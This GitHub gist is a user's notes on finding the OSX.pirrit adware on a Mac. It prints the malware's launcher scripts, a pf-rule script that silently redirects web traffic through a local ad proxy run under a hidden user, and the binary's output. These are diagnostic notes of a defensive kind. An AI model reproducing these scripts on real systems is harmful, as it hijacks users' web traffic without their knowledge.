Last active
July 6, 2016 21:32
-
-
Save dmerejkowsky/7cdf2b9e4c4517f9327e38e024a1d757 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Update: found it: it's the OSX.pirrit virus, see here: | |
http://www.cybereason.com/cybereason-labs-analysis-the-minds-behind-the-osx-pirrit/ | |
Saw a bunch of those running (as root) in htop: | |
$ ls /etc/*.sh | |
/etc/Dicyemida.sh* | |
/etc/Fulah.sh* | |
/etc/Gothism.sh* | |
/etc/audile.sh* | |
/etc/axogamy.sh* | |
/etc/bacteriohemolysin.sh* | |
/etc/branchiosaurian.sh* | |
/etc/duello.sh* | |
/etc/entry.sh* | |
/etc/gallflowerUpd.sh* | |
/etc/hemodystrophy.sh* | |
/etc/lichenlike.sh* | |
/etc/overreach.sh* | |
/etc/retinene.sh* | |
/etc/run_upd.sh* | |
/etc/sidereally.sh* | |
/etc/tealess.sh* | |
/etc/thiocyanide.sh* | |
/etc/unwittingly.sh* | |
All the scripts look the same: | |
if [ -a /Library/branchiosaurian/Contents/MacOS/branchiosaurian ]; | |
then | |
sleep 10 | |
sudo pfctl -evf /etc/branchiosaurian.conf | |
sudo -u Benjy /Library/branchiosaurian/Contents/MacOS/branchiosaurian | |
fi | |
exit 0 | |
Each of them has a folder in /Library/<name>. | |
/Library/<name>/Contents/MacOS/<name> is a Mach-O C++ executable, with deps on Qt4 frameworks stuff (core, gui and network) | |
and a script in Contents/MacOS/rec_script.sh which contains: | |
# set redirections | |
HIDDEN_USER=$(sudo defaults read /Library/Preferences/com.common.plist user_id) | |
echo $HIDDEN_USER | |
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p') | |
if [ -n "$activeInterface" ]; then | |
pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\ | |
pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\ | |
pass out proto tcp all user "$HIDDEN_USER"\n" | |
echo "$pfData" > /etc/pf_proxy.conf | |
else | |
echo "Unable to find active interface" | |
exit 1 | |
fi | |
exit 0 | |
They also have a .conf in /etc | |
$ cat /etc/unwittingly.conf | |
rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882 | |
pass out on en1 route-to lo0 inet proto tcp from en1 to any port 80 keep state | |
pass out proto tcp all user indianaite | |
And `ps aux` shows a pfctl process runnig like this: | |
pfctl -evf /et/<name>.conf | |
I managed to run one of the executables, here's the output: | |
./unwittingly | |
void AdsProxyEngine::init()Ads enabled | |
bool WebProxy::startProxyServer(unsigned int, QString) "/Library/Preferences/com.unwittingly.plist" | |
bool WebProxy::startProxyServer(unsigned int, QString) failed starting web proxy server | |
Started = false | |
bool AdsProxyEngine::startServer() Could not start proxy server | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment